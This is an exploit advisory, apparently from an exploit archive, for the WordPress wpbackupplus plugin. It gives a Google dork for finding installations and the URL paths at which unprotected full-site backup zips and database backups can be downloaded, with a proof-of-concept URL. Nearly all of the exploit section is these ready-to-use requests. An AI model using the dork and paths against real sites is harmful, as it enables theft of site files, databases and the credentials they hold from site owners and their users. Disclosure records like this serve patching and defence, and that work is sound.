25 lines
697 B
Text
Executable file
25 lines
697 B
Text
Executable file
# Exploit Title: Wordpress wpbackupplus Database and files Backup download (0-day)
|
|
# Google Dork: Index of:"/wp-backup-plus"
|
|
# Date: 19/07/2014
|
|
# Exploit Author: pSyCh0_3D (Arfaoui Moslem) https://www.facebook.com/lulz.sec
|
|
# Vendor Homepage: http://wpbackupplus.com/
|
|
# Version:
|
|
# Tested on: win7 32 Bit & Linux Kali
|
|
|
|
[+] Description
|
|
|
|
wpbackupplus make the backup .zip files and not protected
|
|
|
|
[+] Exploit:
|
|
|
|
For download all the website files
|
|
|
|
http://[SITE]/[PATH]/wp-content/uploads/wp-backup-plus/
|
|
|
|
For download the Database backup
|
|
|
|
http://[SITE]/[PATH]/wp-content/uploads/wp-backup-plus/temp
|
|
|
|
[+] POC :
|
|
|
|
http://[SERVER]/wp-content/uploads/wp-backup-plus/temp/
|